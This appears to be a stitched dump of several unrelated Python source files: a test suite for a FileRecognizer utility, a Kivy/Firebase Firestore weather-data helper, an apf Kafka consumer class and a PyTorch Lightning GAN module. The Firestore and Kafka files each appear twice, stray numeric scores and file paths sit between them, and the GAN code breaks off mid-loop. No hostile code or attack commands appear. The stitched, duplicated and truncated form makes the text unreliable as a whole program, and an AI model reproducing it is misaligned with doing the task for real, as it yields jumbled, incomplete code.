b"unreadable_file_link",
b"unreadable_dir_link",
b"unexecutable_dir_link",
b"totally_unusable_dir_link",
b"text.skip_ext",
b"text.dont_skip_ext",
b"dir.skip_ext",
b"skip_dir",
b"fake_skip_dir",
b"text#",
b"foo.bar.baz",
b"tree",
b"socket_test"
]
for filename in files_to_delete:
with catch_and_log_env_error():
os.chmod(filename, 0o777)
if os.path.isdir(filename):
if not filename.startswith(b'/'):
# Make sure we have permission to delete everything
for dirname, dirs, files in os.walk(filename, followlinks=True):
paths = [os.path.join(dirname, p) for p in (dirs + files)]
os.chmod(dirname, 0o777)
for path in paths:
os.chmod(path, 0o777)
with catch_and_log_env_error("Could not delete %r: %r", args=(filename,)):
shutil.rmtree(filename)
else:
with catch_and_log_env_error("Could not delete %r: %r", args=(filename,)):
os.unlink(filename)
def test_binary():
fr = FileRecognizer()
assert fr.is_binary(b"binary")
assert fr.recognize_file(b"binary") == "binary"
assert fr.recognize(b"binary") == "binary"
def test_text():
fr = FileRecognizer()
assert not fr.is_binary(b"text")
assert fr.recognize_file(b"text") == "text"
assert fr.recognize(b"text") == "text"
def test_gzipped():
fr = FileRecognizer()
assert fr.is_binary(b"text.gz")
assert fr.recognize_file(b"text.gz") == "gzip"
assert fr.recognize(b"text.gz") == "gzip"
assert fr.is_binary(b"binary.gz")
assert fr.recognize_file(b"binary.gz") == "binary"
assert fr.recognize(b"binary.gz") == "binary"
assert fr.is_binary(b"fake.gz")
assert fr.recognize_file(b"fake.gz") == "binary"
assert fr.recognize(b"fake.gz") == "binary"
def test_binary_middle():
fr = FileRecognizer(binary_bytes=100)
assert not fr.is_binary(b"binary_middle")
assert fr.recognize_file(b"binary_middle") == "text"
assert fr.recognize(b"binary_middle") == "text"
fr = FileRecognizer(binary_bytes=101)
assert fr.is_binary(b"binary_middle")
assert fr.recognize_file(b"binary_middle") == "binary"
assert fr.recognize(b"binary_middle") == "binary"
def test_socket():
fr = FileRecognizer()
assert fr.recognize(b"socket_test") == "skip"
def test_dir():
fr = FileRecognizer()
assert fr.recognize_directory(b"dir") == "directory"
assert fr.recognize(b"dir") == "directory"
def test_skip_symlinks():
fr = FileRecognizer(skip_symlink_files=True, skip_symlink_dirs=True)
assert fr.recognize(b"binary_link") == "link"
assert fr.recognize_file(b"binary_link") == "link"
assert fr.recognize(b"text_link") == "link"
assert fr.recognize_file(b"text_link") == "link"
assert fr.recognize(b"dir_link") == "link"
assert fr.recognize_directory(b"dir_link") == "link"
def test_do_not_skip_symlinks():
fr = FileRecognizer(skip_symlink_files=False, skip_symlink_dirs=False)
assert fr.recognize(b"binary_link") == "binary"
assert fr.recognize_file(b"binary_link") == "binary"
assert fr.recognize(b"text_link") == "text"
assert fr.recognize_file(b"text_link") == "text"
assert fr.recognize(b"dir_link") == "directory"
assert fr.recognize_directory(b"dir_link") == "directory"
def test_skip_hidden():
fr = FileRecognizer(skip_hidden_files=True, skip_hidden_dirs=True)
assert fr.recognize(b".binary") == "skip"
assert fr.recognize_file(b".binary") == "skip"
assert fr.recognize(b".text") == "skip"
assert fr.recognize_file(b".text") == "skip"
assert fr.recognize(b".dir") == "skip"
assert fr.recognize_directory(b".dir") == "skip"
assert fr.recognize(b".binary_link") == "skip"
assert fr.recognize_file(b".binary_link") == "skip"
assert fr.recognize(b".text_link") == "skip"
assert fr.recognize_file(b".text_link") == "skip"
assert fr.recognize(b".dir_link") == "skip"
assert fr.recognize_directory(b".dir_link") == "skip"
assert fr.recognize(b".text.gz") == "skip"
assert fr.recognize_file(b".text.gz") == "skip"
assert fr.recognize(b".binary.gz") == "skip"
assert fr.recognize_file(b".binary.gz") == "skip"
def test_skip_backup():
fr = FileRecognizer(skip_backup_files=True)
assert fr.recognize_file(b"text~") == "skip"
def test_do_not_skip_backup():
fr = FileRecognizer(skip_backup_files=False)
assert fr.recognize_file(b"text~") == "text"
def test_skip_weird_exts():
fr = FileRecognizer(skip_exts=set())
assert fr.recognize_file(b"text#") == "text"
assert fr.recognize_file(b"foo.bar.baz") == "text"
fr = FileRecognizer(skip_exts=set([b"#", b".bar.baz"]))
assert fr.recognize_file(b"text#") == "skip"
assert fr.recognize_file(b"foo.bar.baz") == "skip"
def test_do_not_skip_hidden_or_symlinks():
fr = FileRecognizer(
skip_hidden_files=False,
skip_hidden_dirs=False,
skip_symlink_dirs=False,
skip_symlink_files=False,
)
assert fr.recognize(b".binary") == "binary"
assert fr.recognize_file(b".binary") == "binary"
assert fr.recognize(b".text") == "text"
assert fr.recognize_file(b".text") == "text"
assert fr.recognize(b".dir") == "directory"
assert fr.recognize_directory(b".dir") == "directory"
assert fr.recognize(b".binary_link") == "binary"
assert fr.recognize_file(b".binary_link") == "binary"
assert fr.recognize(b".text_link") == "text"
assert fr.recognize_file(b".text_link") == "text"
assert fr.recognize(b".dir_link") == "directory"
assert fr.recognize_directory(b".dir_link") == "directory"
assert fr.recognize(b".text.gz") == "gzip"
assert fr.recognize_file(b".text.gz") == "gzip"
assert fr.recognize(b".binary.gz") == "binary"
assert fr.recognize_file(b".binary.gz") == "binary"
def test_do_not_skip_hidden_but_skip_symlinks():
fr = FileRecognizer(
skip_hidden_files=False,
skip_hidden_dirs=False,
skip_symlink_dirs=True,
skip_symlink_files=True,
)
assert fr.recognize(b".binary") == "binary"
assert fr.recognize_file(b".binary") == "binary"
assert fr.recognize(b".text") == "text"
assert fr.recognize_file(b".text") == "text"
assert fr.recognize(b".dir") == "directory"
assert fr.recognize_directory(b".dir") == "directory"
assert fr.recognize(b".binary_link") == "link"
assert fr.recognize_file(b".binary_link") == "link"
assert fr.recognize(b".text_link") == "link"
assert fr.recognize_file(b".text_link") == "link"
assert fr.recognize(b".dir_link") == "link"
assert fr.recognize_directory(b".dir_link") == "link"
assert fr.recognize(b".text.gz") == "gzip"
assert fr.recognize_file(b".text.gz") == "gzip"
assert fr.recognize(b".binary.gz") == "binary"
assert fr.recognize_file(b".binary.gz") == "binary"
def test_lack_of_permissions():
fr = FileRecognizer()
assert fr.recognize(b"unreadable_file") == "unreadable"
assert fr.recognize_file(b"unreadable_file") == "unreadable"
assert fr.recognize(b"unreadable_dir") == "directory"
assert fr.recognize_directory(b"unreadable_dir") == "directory"
assert fr.recognize(b"unexecutable_dir") == "directory"
assert fr.recognize_directory(b"unexecutable_dir") == "directory"
assert fr.recognize(b"totally_unusable_dir") == "directory"
assert fr.recognize_directory(b"totally_unusable_dir") == "directory"
def test_symlink_src_unreadable():
fr = FileRecognizer(skip_symlink_files=False, skip_symlink_dirs=False)
assert fr.recognize(b"unreadable_file_link") == "unreadable"
assert fr.recognize_file(b"unreadable_file_link") == "unreadable"
assert fr.recognize(b"unreadable_dir_link") == "directory"
assert fr.recognize_directory(b"unreadable_dir_link") == "directory"
assert fr.recognize(b"unexecutable_dir_link") == "directory"
assert fr.recognize_directory(b"unexecutable_dir_link") == "directory"
assert fr.recognize(b"totally_unusable_dir_link") == "directory"
assert fr.recognize_directory(b"totally_unusable_dir_link") == "directory"
def test_skip_ext():
fr = FileRecognizer(skip_exts=set([b".skip_ext"]))
assert fr.recognize(b"text.skip_ext") == "skip"
assert fr.recognize_file(b"text.skip_ext") == "skip"
assert fr.recognize(b"text") == "text"
assert fr.recognize_file(b"text") == "text"
assert fr.recognize(b"text.dont_skip_ext") == "text"
assert fr.recognize_file(b"text.dont_skip_ext") == "text"
assert fr.recognize(b"dir.skip_ext") == "directory"
assert fr.recognize_directory(b"dir.skip_ext") == "directory"
def test_skip_dir():
fr = FileRecognizer(skip_dirs=set([b"skip_dir", b"fake_skip_dir"]))
assert fr.recognize(b"skip_dir") == "skip"
assert fr.recognize_directory(b"skip_dir") == "skip"
assert fr.recognize(b"fake_skip_dir") == "text"
assert fr.recognize_file(b"fake_skip_dir") == "text"
def test_walking():
fr = FileRecognizer(
skip_hidden_files=True,
skip_hidden_dirs=True,
skip_exts=set([b".skip_ext"]),
skip_dirs=set([b"skip_dir"]),
)
truth = [
(b"tree/binary", "binary"),
(b"tree/dir.skip_ext/text", "text"),
(b"tree/dir/subdir/text", "text"),
(b"tree/dir/text", "text"),
(b"tree/text", "text"),
(b"tree/text.dont_skip_ext", "text"),
]
result = sorted(fr.walk(b"tree"))
assert result == truth
def predot():
os.chdir(b"tree")
def postdot():
os.chdir(b"..")
@nose.with_setup(predot, postdot)
def test_dot():
fr = FileRecognizer(
skip_hidden_files=True,
skip_hidden_dirs=True,
skip_exts=set([b".skip_ext"]),
skip_dirs=set([b"skip_dir"]),
)
truth = [
(b"./binary", "binary"),
(b"./dir.skip_ext/text", "text"),
(b"./dir/subdir/text", "text"),
(b"./dir/text", "text"),
(b"./text", "text"),
(b"./text.dont_skip_ext", "text"),
]
result = sorted(fr.walk(b"."))
assert result == truth
def predotdot():
os.chdir(b"tree")
os.chdir(b"dir")
def postdotdot():
os.chdir(b"..")
os.chdir(b"..")
@nose.with_setup(predotdot, postdotdot)
def test_dot_dot():
fr = FileRecognizer(
skip_hidden_files=True,
skip_hidden_dirs=True,
skip_exts=set([b".skip_ext"]),
skip_dirs=set([b"skip_dir"]),
)
truth = [
(b"../binary", "binary"),
(b"../dir.skip_ext/text", "text"),
(b"../dir/subdir/text", "text"),
(b"../dir/text", "text"),
(b"../text", "text"),
(b"../text.dont_skip_ext", "text"),
]
result = sorted(fr.walk(b".."))
assert result == truth | 0.278061 | 0.12921 |
from kivy.app import App
from jnius import autoclass, cast, PythonJavaClass, java_method
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
context = cast('android.content.Context', currentActivity.getApplicationContext())
FirebaseApp = autoclass('com.google.firebase.FirebaseApp')
FirebaseFirestore = autoclass('com.google.firebase.firestore.FirebaseFirestore')
HashMap = autoclass('java.util.HashMap')
FirebaseApp.initializeApp(context)
instance = FirebaseFirestore.getInstance()
APP_INSTANCE = App.get_running_app()
# writing
def write_weather_data():
myMap = HashMap()
myMap.put("temperature", 25)
myMap.put("sky", "cloudy")
myMap.put("wind_speed", 11.5)
myMap.put("wind_speed_unit", "km")
instance.collection("weather").document("today").set(myMap)
def read_weather_data():
task = instance.collection("weather").document("today").get()
task.addOnSuccessListener(TodaySuccessListener())
class TodaySuccessListener(PythonJavaClass):
__javainterfaces__ = ['com/google/android/gms/tasks/OnSuccessListener']
# Include line or this exception happens
# jnius.jnius.JavaException: JVM exception occurred: interface com.google.android.gms.tasks.OnCompleteListener is not visible from class loader java.lang.IllegalArgumentException
__javacontext__ = "app"
# You get "ValueError: need more than 1 value to unpack" <- if you dont add ;
# https://github.com/kivy/pyjnius/blob/master/jnius/jnius_utils.pxi#L43
@java_method('(Ljava/lang/Object;)V')
def onSuccess(self, doc):
data = doc.getData()
for key in data.keySet():
APP_INSTANCE.weather_data[key] = data.get(key)
today_listener = None
def stream_weather_data():
global today_listener
todayRef = instance.collection("weather").document("today")
if today_listener is None:
today_listener = todayRef.addSnapshotListener(TodaySnapshotStream())
def remove_listener_of_weather_data():
global today_listener
if today_listener is not None:
today_listener.remove()
class TodaySnapshotStream(PythonJavaClass):
__javainterfaces__ = ['com/google/firebase/firestore/EventListener']
__javacontext__ = "app"
# I'm using java/lang/Object though if you want to be specific, you can use
# com/google/firebase/firestore/DocumentSnapshot
@java_method('(Ljava/lang/Object;Lcom/google/firebase/firestore/FirebaseFirestoreException;)V')
def onEvent(self, doc, error):
try:
data = doc.getData()
for key in data.keySet():
APP_INSTANCE.weather_data[key] = data.get(key)
print(APP_INSTANCE.weather_data)
except Exception as e:
print(e) | myapp/utils.py | from kivy.app import App
from jnius import autoclass, cast, PythonJavaClass, java_method
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
context = cast('android.content.Context', currentActivity.getApplicationContext())
FirebaseApp = autoclass('com.google.firebase.FirebaseApp')
FirebaseFirestore = autoclass('com.google.firebase.firestore.FirebaseFirestore')
HashMap = autoclass('java.util.HashMap')
FirebaseApp.initializeApp(context)
instance = FirebaseFirestore.getInstance()
APP_INSTANCE = App.get_running_app()
# writing
def write_weather_data():
myMap = HashMap()
myMap.put("temperature", 25)
myMap.put("sky", "cloudy")
myMap.put("wind_speed", 11.5)
myMap.put("wind_speed_unit", "km")
instance.collection("weather").document("today").set(myMap)
def read_weather_data():
task = instance.collection("weather").document("today").get()
task.addOnSuccessListener(TodaySuccessListener())
class TodaySuccessListener(PythonJavaClass):
__javainterfaces__ = ['com/google/android/gms/tasks/OnSuccessListener']
# Include line or this exception happens
# jnius.jnius.JavaException: JVM exception occurred: interface com.google.android.gms.tasks.OnCompleteListener is not visible from class loader java.lang.IllegalArgumentException
__javacontext__ = "app"
# You get "ValueError: need more than 1 value to unpack" <- if you dont add ;
# https://github.com/kivy/pyjnius/blob/master/jnius/jnius_utils.pxi#L43
@java_method('(Ljava/lang/Object;)V')
def onSuccess(self, doc):
data = doc.getData()
for key in data.keySet():
APP_INSTANCE.weather_data[key] = data.get(key)
today_listener = None
def stream_weather_data():
global today_listener
todayRef = instance.collection("weather").document("today")
if today_listener is None:
today_listener = todayRef.addSnapshotListener(TodaySnapshotStream())
def remove_listener_of_weather_data():
global today_listener
if today_listener is not None:
today_listener.remove()
class TodaySnapshotStream(PythonJavaClass):
__javainterfaces__ = ['com/google/firebase/firestore/EventListener']
__javacontext__ = "app"
# I'm using java/lang/Object though if you want to be specific, you can use
# com/google/firebase/firestore/DocumentSnapshot
@java_method('(Ljava/lang/Object;Lcom/google/firebase/firestore/FirebaseFirestoreException;)V')
def onEvent(self, doc, error):
try:
data = doc.getData()
for key in data.keySet():
APP_INSTANCE.weather_data[key] = data.get(key)
print(APP_INSTANCE.weather_data)
except Exception as e:
print(e) | 0.508788 | 0.062991 |
from apf.consumers.generic import GenericConsumer
from confluent_kafka import Consumer, KafkaException
import fastavro
import io
import importlib
class KafkaConsumer(GenericConsumer):
"""Consume from a Kafka Topic.
By default :class:`KafkaConsumer` uses a manual commit strategy to avoid data loss on errors.
This strategy can be disabled completly adding `"COMMIT":False` to the `STEP_CONFIG` variable
in the step's `settings.py` file, this can be useful for step testing because Kafka doesn't save
the messages that already were processed.
**Example:**
.. code-block:: python
#settings.py
STEP_CONFIG = { ...
"COMMIT": False #Disable commit
#useful for testing/debugging.
}
Parameters
-----------
TOPICS: list
List of topics to consume.
**Example:**
Subscribe to a fixed list of topics:
.. code-block:: python
#settings.py
CONSUMER_CONFIG = { ...
"TOPICS": ["topic1", "topic2"]
}
Using `confluent_kafka` syntax we can subscribe to a pattern
.. code-block:: python
#settings.py
CONSUMER_CONFIG = { ...
"TOPICS": ["^topic*"]
}
More on pattern subscribe
`here <http://docs.confluent.io/current/clients/confluent-kafka-python/#confluent_kafka.Consumer.subscribe>`_
TOPIC_STRATEGY: dict
Parameters to configure a topic strategy instead of a fixed topic list.
The required parameters are:
- *CLASS*: `apf.core.topic_management.GenericTopicStrategy` class to be used.
- *PARAMS*: Parameters passed to *CLASS* object.
**Example:**
A topic strategy that updates on 23 hours UTC every day.
.. code-block:: python
#settings.py
CONSUMER_CONFIG = { ...
"TOPIC_STRATEGY": {
"CLASS": "apf.core.topic_management"+\\
"DailyTopicStrategy",
"PARAMS": {
"topic_format": [
"ztf_%s_programid1",
"ztf_%s_programid3"
],
"date_format": "%Y%m%d",
"change_hour": 23,
"retention_days": 8,
}
}
}
PARAMS: dict
Parameters passed to :class:`confluent_kafka.Consumer`
The required parameters are:
- *bootstrap.servers*: comma separated <host:port> :py:class:`str` to brokers.
- *group.id*: :py:class:`str` with consumer group name.
**Example:**
Configure a Kafka Consumer to a secure Kafka Cluster
.. code-block:: python
#settings.py
CONSUMER_CONFIG = { ...
"PARAMS": {
"bootstrap.servers": "kafka1:9093,kafka2:9093",
"group.id": "step_group",
'security.protocol': 'SSL',
'ssl.ca.location': '<ca-cert path>',
'ssl.keystore.location': '<keystore path>',
'ssl.keystore.password': '<<PASSWORD>>'
}
}
all supported `confluent_kafka` parameters can be found
`here <https://github.com/edenhill/librdkafka/blob/master/CONFIGURATION.md>`_
"""
def __init__(self, config):
super().__init__(config)
# Disable auto commit
self.config["PARAMS"]["enable.auto.commit"] = False
# Creating consumer
self.consumer = Consumer(self.config["PARAMS"])
self.max_retries = int(self.config.get("COMMIT_RETRY", 5))
self.logger.info(
f"Creating consumer for {self.config['PARAMS'].get('bootstrap.servers')}"
)
self.dynamic_topic = False
if self.config.get("TOPICS"):
self.logger.info(f'Subscribing to {self.config["TOPICS"]}')
self.consumer.subscribe(self.config["TOPICS"])
elif self.config.get("TOPIC_STRATEGY"):
self.dynamic_topic = True
module_name, class_name = self.config["TOPIC_STRATEGY"]["CLASS"].rsplit(
".", 1
)
TopicStrategy = getattr(importlib.import_module(module_name), class_name)
self.topic_strategy = TopicStrategy(
**self.config["TOPIC_STRATEGY"]["PARAMS"]
)
self.topics = self.topic_strategy.get_topics()
self.logger.info(f'Using {self.config["TOPIC_STRATEGY"]}')
self.logger.info(f"Subscribing to {self.topics}")
self.consumer.subscribe(self.topics)
else:
raise Exception("No topics o topic strategy set. ")
def __del__(self):
self.logger.info("Shutting down Consumer")
if hasattr(self, "consumer"):
self.consumer.close()
def _deserialize_message(self, message):
bytes_io = io.BytesIO(message.value())
reader = fastavro.reader(bytes_io)
data = reader.next()
return data
def _check_topics(self):
"""
Returns true if new topic
"""
topics = self.topic_strategy.get_topics()
if topics != self.topics:
return True
return False
def _subscribe_to_new_topics(self):
"""
Sets current topic to new topic
"""
self.topics = self.topic_strategy.get_topics()
self.consumer.unsubscribe()
self.logger.info(f"Suscribing to {self.topics}")
self.consumer.subscribe(self.topics)
def set_basic_config(self, num_messages, timeout):
if "consume.messages" in self.config:
num_messages = self.config["consume.messages"]
elif "NUM_MESSAGES" in self.config:
num_messages = self.config["NUM_MESSAGES"]
if "consume.timeout" in self.config:
timeout = self.config["consume.timeout"]
elif "TIMEOUT" in self.config:
timeout = self.config["TIMEOUT"]
return num_messages, timeout
def consume(self, num_messages=1, timeout=60):
"""
Consumes `num_messages` messages from the specified topic.
Will return a dictionary or a list, depending on the number of messages consumed.
If num_messages > 1 then it returns list.
If num_messages = 1 then it returns dict.
Parameters
--------------
num_messages: int
Number of messages to be consumed
timeout: int
Seconds to wait when consuming messages. Raises exception if doesn't get the messages after
specified time
"""
num_messages, timeout = self.set_basic_config(num_messages, timeout)
messages = []
while True:
if self.dynamic_topic:
if self._check_topics():
self._subscribe_to_new_topics()
messages = self.consumer.consume(num_messages=num_messages, timeout=timeout)
if len(messages) == 0:
continue
deserialized = []
for message in messages:
if message.error():
if message.error().name() == "_PARTITION_EOF":
self.logger.info("PARTITION_EOF: No more messages")
return
self.logger.exception(f"Error in kafka stream: {message.error()}")
continue
else:
message = self._deserialize_message(message)
deserialized.append(message)
self.messages = messages
messages = []
if len(deserialized) > 0:
if num_messages == 1:
yield deserialized[0]
else:
yield deserialized
def commit(self):
retries = 0
commited = False
while not commited:
try:
self.consumer.commit(asynchronous=False)
commited = True
except KafkaException as e:
retries += 1
# Rasing the same error
if retries == self.max_retries:
raise e | apf/consumers/kafka.py | from apf.consumers.generic import GenericConsumer
from confluent_kafka import Consumer, KafkaException
import fastavro
import io
import importlib
class KafkaConsumer(GenericConsumer):
"""Consume from a Kafka Topic.
By default :class:`KafkaConsumer` uses a manual commit strategy to avoid data loss on errors.
This strategy can be disabled completly adding `"COMMIT":False` to the `STEP_CONFIG` variable
in the step's `settings.py` file, this can be useful for step testing because Kafka doesn't save
the messages that already were processed.
**Example:**
.. code-block:: python
#settings.py
STEP_CONFIG = { ...
"COMMIT": False #Disable commit
#useful for testing/debugging.
}
Parameters
-----------
TOPICS: list
List of topics to consume.
**Example:**
Subscribe to a fixed list of topics:
.. code-block:: python
#settings.py
CONSUMER_CONFIG = { ...
"TOPICS": ["topic1", "topic2"]
}
Using `confluent_kafka` syntax we can subscribe to a pattern
.. code-block:: python
#settings.py
CONSUMER_CONFIG = { ...
"TOPICS": ["^topic*"]
}
More on pattern subscribe
`here <http://docs.confluent.io/current/clients/confluent-kafka-python/#confluent_kafka.Consumer.subscribe>`_
TOPIC_STRATEGY: dict
Parameters to configure a topic strategy instead of a fixed topic list.
The required parameters are:
- *CLASS*: `apf.core.topic_management.GenericTopicStrategy` class to be used.
- *PARAMS*: Parameters passed to *CLASS* object.
**Example:**
A topic strategy that updates on 23 hours UTC every day.
.. code-block:: python
#settings.py
CONSUMER_CONFIG = { ...
"TOPIC_STRATEGY": {
"CLASS": "apf.core.topic_management"+\\
"DailyTopicStrategy",
"PARAMS": {
"topic_format": [
"ztf_%s_programid1",
"ztf_%s_programid3"
],
"date_format": "%Y%m%d",
"change_hour": 23,
"retention_days": 8,
}
}
}
PARAMS: dict
Parameters passed to :class:`confluent_kafka.Consumer`
The required parameters are:
- *bootstrap.servers*: comma separated <host:port> :py:class:`str` to brokers.
- *group.id*: :py:class:`str` with consumer group name.
**Example:**
Configure a Kafka Consumer to a secure Kafka Cluster
.. code-block:: python
#settings.py
CONSUMER_CONFIG = { ...
"PARAMS": {
"bootstrap.servers": "kafka1:9093,kafka2:9093",
"group.id": "step_group",
'security.protocol': 'SSL',
'ssl.ca.location': '<ca-cert path>',
'ssl.keystore.location': '<keystore path>',
'ssl.keystore.password': '<<PASSWORD>>'
}
}
all supported `confluent_kafka` parameters can be found
`here <https://github.com/edenhill/librdkafka/blob/master/CONFIGURATION.md>`_
"""
def __init__(self, config):
super().__init__(config)
# Disable auto commit
self.config["PARAMS"]["enable.auto.commit"] = False
# Creating consumer
self.consumer = Consumer(self.config["PARAMS"])
self.max_retries = int(self.config.get("COMMIT_RETRY", 5))
self.logger.info(
f"Creating consumer for {self.config['PARAMS'].get('bootstrap.servers')}"
)
self.dynamic_topic = False
if self.config.get("TOPICS"):
self.logger.info(f'Subscribing to {self.config["TOPICS"]}')
self.consumer.subscribe(self.config["TOPICS"])
elif self.config.get("TOPIC_STRATEGY"):
self.dynamic_topic = True
module_name, class_name = self.config["TOPIC_STRATEGY"]["CLASS"].rsplit(
".", 1
)
TopicStrategy = getattr(importlib.import_module(module_name), class_name)
self.topic_strategy = TopicStrategy(
**self.config["TOPIC_STRATEGY"]["PARAMS"]
)
self.topics = self.topic_strategy.get_topics()
self.logger.info(f'Using {self.config["TOPIC_STRATEGY"]}')
self.logger.info(f"Subscribing to {self.topics}")
self.consumer.subscribe(self.topics)
else:
raise Exception("No topics o topic strategy set. ")
def __del__(self):
self.logger.info("Shutting down Consumer")
if hasattr(self, "consumer"):
self.consumer.close()
def _deserialize_message(self, message):
bytes_io = io.BytesIO(message.value())
reader = fastavro.reader(bytes_io)
data = reader.next()
return data
def _check_topics(self):
"""
Returns true if new topic
"""
topics = self.topic_strategy.get_topics()
if topics != self.topics:
return True
return False
def _subscribe_to_new_topics(self):
"""
Sets current topic to new topic
"""
self.topics = self.topic_strategy.get_topics()
self.consumer.unsubscribe()
self.logger.info(f"Suscribing to {self.topics}")
self.consumer.subscribe(self.topics)
def set_basic_config(self, num_messages, timeout):
if "consume.messages" in self.config:
num_messages = self.config["consume.messages"]
elif "NUM_MESSAGES" in self.config:
num_messages = self.config["NUM_MESSAGES"]
if "consume.timeout" in self.config:
timeout = self.config["consume.timeout"]
elif "TIMEOUT" in self.config:
timeout = self.config["TIMEOUT"]
return num_messages, timeout
def consume(self, num_messages=1, timeout=60):
"""
Consumes `num_messages` messages from the specified topic.
Will return a dictionary or a list, depending on the number of messages consumed.
If num_messages > 1 then it returns list.
If num_messages = 1 then it returns dict.
Parameters
--------------
num_messages: int
Number of messages to be consumed
timeout: int
Seconds to wait when consuming messages. Raises exception if doesn't get the messages after
specified time
"""
num_messages, timeout = self.set_basic_config(num_messages, timeout)
messages = []
while True:
if self.dynamic_topic:
if self._check_topics():
self._subscribe_to_new_topics()
messages = self.consumer.consume(num_messages=num_messages, timeout=timeout)
if len(messages) == 0:
continue
deserialized = []
for message in messages:
if message.error():
if message.error().name() == "_PARTITION_EOF":
self.logger.info("PARTITION_EOF: No more messages")
return
self.logger.exception(f"Error in kafka stream: {message.error()}")
continue
else:
message = self._deserialize_message(message)
deserialized.append(message)
self.messages = messages
messages = []
if len(deserialized) > 0:
if num_messages == 1:
yield deserialized[0]
else:
yield deserialized
def commit(self):
retries = 0
commited = False
while not commited:
try:
self.consumer.commit(asynchronous=False)
commited = True
except KafkaException as e:
retries += 1
# Rasing the same error
if retries == self.max_retries:
raise e | 0.84941 | 0.279712 |
import pytorch_lightning as pl
from nets.factory import factory as nets_fac
from optimization.loss_functions import factory as loss_fac
from optimization.optimizers import factory as opt_fac
import numpy as np
from datetime import datetime
import os
import torch
import torchvision.utils as vutils
from pytorch_lightning.metrics import PSNR
import matplotlib.pyplot as plt
import utils.utils as utils
import math
class GAN(pl.LightningModule):
def __init__(self, config):
super().__init__()
self.config = config
self.gen = nets_fac[config['gen_cfg']['type']](config['gen_cfg'])
self.disc = nets_fac[config['disc_cfg']['type']](config['disc_cfg'])
self.gen_loss = loss_fac[config['gen_cfg']['loss_cfg']['type']](config['gen_cfg']['loss_cfg'],
self.gen, self.disc)
self.disc_loss = loss_fac[config['disc_cfg']['loss_cfg']['type']](config['disc_cfg']['loss_cfg'],
self.gen, self.disc)
self.num_disc_steps = config['num_disc_steps']
if 'test_cfg' in config:
self.test_cfg = config['test_cfg']
self.noise_std_traversal = config['test_cfg']['noise_std_traversal']
self.num_avg_samples_traversal = config['test_cfg']['num_avg_samples_traversal']
self.num_fid_evals = config['test_cfg']['num_fid_evals']
self.divide_expanded_forward_pass = config['test_cfg']['divide_expanded_forward_pass']
self.collages = None
self.ours_s_fids = None
self.ours_a_fids = None
self.psnr_for_ours_a_fid = None
self.psnr_for_ours_s_fid = None
self.collage_metric = None
self.val_path = None
self.m_real = None
self.s_real = None
self.test_path = None
self.denoiser_criteria = None
def on_load_checkpoint(self, checkpoint):
sd = self.state_dict()
for param in sd:
if param in checkpoint['state_dict'] and sd[param].size() != checkpoint['state_dict'][param].size():
del checkpoint['state_dict'][param]
def configure_optimizers(self):
gen_opt = opt_fac[self.config['optim_cfg']['type']](self.gen.parameters(), self.config['optim_cfg'])
disc_opt = opt_fac[self.config['optim_cfg']['type']](self.disc.parameters(), self.config['optim_cfg'])
return {'optimizer': gen_opt, 'frequency': 1}, {'optimizer': disc_opt, 'frequency': self.num_disc_steps}
def forward(self, y, **kwargs):
gen_out = self.gen(y=y, encoder_assistance=True, **kwargs)
return gen_out
def batch_postprocess(self, batch):
return batch['real'], batch['noisy']
def training_step(self, batch, batch_idx, optimizer_idx):
x, y = self.batch_postprocess(batch)
if optimizer_idx == 0:
loss, logs = self.gen_loss(real=x, gen_input=y, batch_idx=batch_idx)
self.log_dict(logs, prog_bar=True, logger=True)
else:
loss, logs = self.disc_loss(real=x, gen_input=y)
self.log_dict(logs, prog_bar=True, logger=True)
return loss
def validation_step(self, batch, batch_idx):
if self.collage_metric is None:
self.collage_metric = utils.CollageVal().to(self.device)
x, y = self.batch_postprocess(batch)
y_expanded = utils.expand_4d_batch(y, 4)
with torch.no_grad():
out = self(y=y_expanded, noise_stds=1)
if batch_idx == 0:
self.collage_metric.update(x)
self.collage_metric.update(out)
def validation_epoch_end(self, outputs):
out = self.collage_metric.compute()
self.collage_metric.reset()
fig = plt.figure(figsize=(15, 15))
plt.axis("off")
plt.title("Generated Images")
plt.imshow(np.transpose(vutils.make_grid(out.clamp_(0, 1).detach().cpu(), padding=2,
normalize=False, range=(0, 1)), (1, 2, 0)))
fig.savefig(os.path.join(self.val_path, str(self.current_epoch).zfill(5) + "_fake_collage_" +
datetime.now().strftime("%d-%m-%Y_%I-%M-%S_%p") + ".png"), dpi=350)
def on_test_epoch_start(self):
if self.test_cfg['collages']:
self.collages = torch.nn.ModuleDict(
{str(i): utils.Collage(i, self.test_path, 8,
["real", "noisy"] +
['fake_z' + str(noise_std) for noise_std in self.noise_std_traversal] +
["mean", "std_dev_z1"]).to(self.device) for i in self.test_cfg['save_batch']})
if self.test_cfg['fid_and_psnr']:
self.m_real, self.s_real, model = utils.init_fid(self.test_cfg['training_data_stats_path'],
self.train_dataloader(),
self.device,
verbose=False)
self.ours_a_fids = torch.nn.ModuleList([utils.FID(1, self.m_real, self.s_real, model)
for _ in self.num_avg_samples_traversal]).to(self.device)
self.psnr_for_ours_a_fid = torch.nn.ModuleList([PSNR(1)
for _ in self.num_avg_samples_traversal]).to(self.device)
self.ours_s_fids = torch.nn.ModuleList([utils.FID(self.num_fid_evals, self.m_real, self.s_real, model)
for _ in self.noise_std_traversal]).to(self.device)
self.psnr_for_ours_s_fid = torch.nn.ModuleList([PSNR(1)
for _ in self.noise_std_traversal]).to(self.device)
if self.test_cfg['denoiser_criteria']:
avg_kernel = 1/(3*15*15) * torch.ones(1, 3, 15, 15).to(self.device)
self.denoiser_criteria = utils.DenoiserCriteria(avg_kernel).to(self.device)
def forward_with_divisor(self, y, divisor, **kwargs):
out = []
for i in range(divisor):
out.append(self(y[i * y.shape[0] // divisor: (i + 1) * y.shape[0] // divisor], **kwargs))
return torch.cat(out, dim=0)
def test_step(self, batch, batch_idx):
x, y = self.batch_postprocess(batch)
with torch.no_grad():
save_collage = self.test_cfg['collages'] and batch_idx in self.test_cfg['save_batch']
idx = None
if self.test_cfg['fid_and_psnr'] or save_collage:
if save_collage:
idx = str(batch_idx)
self.collages[idx].set_batch_size(x.shape[0])
self.collages[idx].update("real", x)
self.collages[idx].update("noisy", y)
expansion = max(8, self.num_fid_evals) if save_collage else self.num_fid_evals
y_expanded = utils.expand_4d_batch(y, expansion)
x_expanded = utils.expand_4d_batch(x, expansion)
out_reshaped_64_sigma_1 = None
for i, noise_stds in enumerate(self.noise_std_traversal):
